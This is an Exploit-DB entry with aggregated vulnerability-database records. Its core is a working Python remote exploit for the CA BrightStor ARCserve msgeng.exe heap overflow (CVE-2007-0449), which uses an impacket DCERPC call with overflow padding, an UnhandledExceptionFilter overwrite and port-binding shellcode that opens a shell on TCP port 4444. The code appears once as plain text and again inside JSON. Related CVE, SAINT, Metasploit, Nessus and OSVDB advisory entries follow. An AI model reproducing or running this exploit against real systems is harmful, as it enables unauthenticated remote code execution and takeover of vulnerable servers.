CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit
2007-01-27T00:00:00
ID EDB-ID:3211 Type exploitdb Reporter Winny Thomas Modified 2007-01-27T00:00:00
Description
CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform
#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
request = "A" * 676
request += "\x90\x90\x90\x90"
request += "\x90\x90\xeb\x0a"
#Call dword ptr [esi +4C] from user32.dll
request += struct.pack("<L", 0x77E4FB7A)
#Overwrite UnhandledExceptionFilter in Windows 2000 SP0
request += struct.pack("<L", 0x77EE044C)
request += "\x90\x90\x90\x90" * 2
#Portbinding shellcode; Opens shell on TCP port 4444
request += "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
request += "\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
request += "\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
request += "\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
request += "\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
request += "\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
request += "\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
request += "\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
request += "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
request += "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
request += "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
request += "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
request += "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
request += "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
request += "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
request += "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
request += "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
request += "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
request += "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
request += "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
request += "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
request += "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"
dce.call(43, request)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
DCEconnectAndExploit(target)
# milw0rm.com [2007-01-27]
{"hash": "2aca18a170d5fab7883597b2b7dce79ba9a324f6080607c3882a770142e729bb", "id": "EDB-ID:3211", "lastseen": "2016-01-31T17:58:26", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/3211/", "description": "CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform", "title": "CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit", "sourceData": "#!/usr/bin/python\n# I couldnt find a reliable exploit for my analysis and so came up with this.\n# Remote exploit for the CA BrightStor msgeng.exe service heap overflow\n# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was\n# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard\n# to port to other platforms. The exploit overwrites the\n# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the\n# address of call dword ptr [esi +4C] located in user32.dll. At the time when\n# UEF is called esi +4C contains a pointer to our shellcode.\n#\n# Winny M Thomas ;-)\n# Author shall bear no responsibility for any screw ups caused by using this code\n\nfrom impacket.dcerpc import transport, dcerpc\nfrom impacket import uuid\nimport struct\nimport sys\n\ndef DCEconnectAndExploit(target):\n trans = transport.TCPTransport(target, 6503)\n trans.connect()\n dce = dcerpc.DCERPC_v5(trans)\n dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))\n\n request = \"A\" * 676\n request += \"\\x90\\x90\\x90\\x90\"\n request += \"\\x90\\x90\\xeb\\x0a\"\n\n #Call dword ptr [esi +4C] from user32.dll\n request += struct.pack(\"<L\", 0x77E4FB7A)\n #Overwrite UnhandledExceptionFilter in Windows 2000 SP0\n request += struct.pack(\"<L\", 0x77EE044C)\n request += \"\\x90\\x90\\x90\\x90\" * 2\n #Portbinding shellcode; Opens shell on TCP port 4444\n request += \"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe0\"\n request += \"\\x6f\\xe3\\x2a\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x05\\x08\\x67\\x08\\x96\\x1c\\xd5\"\n request += \"\\x1f\\x0f\\x68\\x46\\xc4\\x4b\\x68\\x6f\\xdc\\xe4\\x9f\\x2f\\x98\\x6e\\x0c\\xa1\"\n request += \"\\xaf\\x77\\x68\\x75\\xc0\\x6e\\x08\\x63\\x6b\\x5b\\x68\\x2b\\x0e\\x5e\\x23\\xb3\"\n request += \"\\x4c\\xeb\\x23\\x5e\\xe7\\xae\\x29\\x27\\xe1\\xad\\x08\\xde\\xdb\\x3b\\xc7\\x02\"\n request += \"\\x95\\x8a\\x68\\x75\\xc4\\x6e\\x08\\x4c\\x6b\\x63\\xa8\\xa1\\xbf\\x73\\xe2\\xc1\"\n request += \"\\xe3\\x43\\x68\\xa3\\x8c\\x4b\\xff\\x4b\\x23\\x5e\\x38\\x4e\\x6b\\x2c\\xd3\\xa1\"\n request += \"\\xa0\\x63\\x68\\x5a\\xfc\\xc2\\x68\\x6a\\xe8\\x31\\x8b\\xa4\\xae\\x61\\x0f\\x7a\"\n request += \"\\x1f\\xb9\\x85\\x79\\x86\\x07\\xd0\\x18\\x88\\x18\\x90\\x18\\xbf\\x3b\\x1c\\xfa\"\n request += \"\\x88\\xa4\\x0e\\xd6\\xdb\\x3f\\x1c\\xfc\\xbf\\xe6\\x06\\x4c\\x61\\x82\\xeb\\x28\"\n request += \"\\xb5\\x05\\xe1\\xd5\\x30\\x07\\x3a\\x23\\x15\\xc2\\xb4\\xd5\\x36\\x3c\\xb0\\x79\"\n request += \"\\xb3\\x3c\\xa0\\x79\\xa3\\x3c\\x1c\\xfa\\x86\\x07\\xf2\\x76\\x86\\x3c\\x6a\\xcb\"\n request += \"\\x75\\x07\\x47\\x30\\x90\\xa8\\xb4\\xd5\\x36\\x05\\xf3\\x7b\\xb5\\x90\\x33\\x42\"\n request += \"\\x44\\xc2\\xcd\\xc3\\xb7\\x90\\x35\\x79\\xb5\\x90\\x33\\x42\\x05\\x26\\x65\\x63\"\n request += \"\\xb7\\x90\\x35\\x7a\\xb4\\x3b\\xb6\\xd5\\x30\\xfc\\x8b\\xcd\\x99\\xa9\\x9a\\x7d\"\n request += \"\\x1f\\xb9\\xb6\\xd5\\x30\\x09\\x89\\x4e\\x86\\x07\\x80\\x47\\x69\\x8a\\x89\\x7a\"\n request += \"\\xb9\\x46\\x2f\\xa3\\x07\\x05\\xa7\\xa3\\x02\\x5e\\x23\\xd9\\x4a\\x91\\xa1\\x07\"\n request += \"\\x1e\\x2d\\xcf\\xb9\\x6d\\x15\\xdb\\x81\\x4b\\xc4\\x8b\\x58\\x1e\\xdc\\xf5\\xd5\"\n request += \"\\x95\\x2b\\x1c\\xfc\\xbb\\x38\\xb1\\x7b\\xb1\\x3e\\x89\\x2b\\xb1\\x3e\\xb6\\x7b\"\n request += \"\\x1f\\xbf\\x8b\\x87\\x39\\x6a\\x2d\\x79\\x1f\\xb9\\x89\\xd5\\x1f\\x58\\x1c\\xfa\"\n request += \"\\x6b\\x38\\x1f\\xa9\\x24\\x0b\\x1c\\xfc\\xb2\\x90\\x33\\x42\\x10\\xe5\\xe7\\x75\"\n request += \"\\xb3\\x90\\x35\\xd5\\x30\\x6f\\xe3\\x2a\"\n\n dce.call(43, request)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <target ip>\\n' % sys.argv[0]\n sys.exit(-1)\n\n DCEconnectAndExploit(target)\n\n# milw0rm.com [2007-01-27]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-0449"], "published": "2007-01-27T00:00:00", "osvdbidlist": ["31593"], "references": [], "reporter": "Winny Thomas", "modified": "2007-01-27T00:00:00", "href": "https://www.exploit-db.com/exploits/3211/"}
{"result": {"cve": [{"id": "CVE-2007-0449", "type": "cve", "title": "CVE-2007-0449", "description": "Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and Business Protection Suite r2, and Desktop Management Suite (DMS) r11.0 and r11.1 allow remote attackers to execute arbitrary code via crafted packets to TCP port (1) 1900 or (2) 2200.", "published": "2007-01-23T16:28:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0449", "cvelist": ["CVE-2007-0449"], "lastseen": "2017-07-29T11:21:50"}], "saint": [{"id": "SAINT:C246974F40EAE8BFB0C170267BC4B213", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-02-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2017-01-10T14:03:42"}, {"id": "SAINT:AC07CF401B0C02203F9F5BD5BA41706E", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-02-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-10-03T15:02:00"}, {"id": "SAINT:17867A60CC8CA6EA88789A5EEAB306FD", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-02-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-12-14T16:58:05"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.", "published": "2007-02-04T01:58:50", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2007-0449"], "lastseen": "2018-03-08T07:10:07"}], "exploitdb": [{"id": "EDB-ID:16400", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-0449. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16400/", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-02-01T23:47:04"}], "packetstorm": [{"id": "PACKETSTORM:83087", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83087/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-12-05T22:15:29"}], "osvdb": [{"id": "OSVDB:31593", "type": "osvdb", "title": "CA BrightStor ARCserve Backup Multiple Overflows", "description": "## Solution Description\nUpgrade to appropriate version recommended by the vendor or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp\nVendor Specific News/Changelog Entry: http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696\n[Secunia Advisory ID:23897](https://secuniaresearch.flexerasoftware.com/advisories/23897/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0545.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0683.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0684.html\nISS X-Force ID: 31704\nFrSIRT Advisory: ADV-2007-0314\n[CVE-2007-0449](https://vulners.com/cve/CVE-2007-0449)\nCERT VU: 611276\nCERT VU: 357308\nBugtraq ID: 22342\nBugtraq ID: 22340\n", "published": "2007-01-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:31593", "cvelist": ["CVE-2007-0449"], "lastseen": "2017-04-28T13:20:27"}], "nessus": [{"id": "ARCSERVE_QO83833.NASL", "type": "nessus", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Server Multiple Vulnerabilities (QO83833)", "description": "According to its version, the installation of BrightStor ARCserve Backup for Laptops & Desktops Server on the remote host is affected by multiple buffer overflows and denial of service vulnerabilities that can be exploited by a remote attacker to execute arbitrary code on the affected host with LOCAL SYSTEM privileges or to crash the associated services.", "published": "2007-01-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=24240", "cvelist": ["CVE-2007-0449", "CVE-2007-0672", "CVE-2007-0673"], "lastseen": "2017-10-29T13:40:30"}]}}
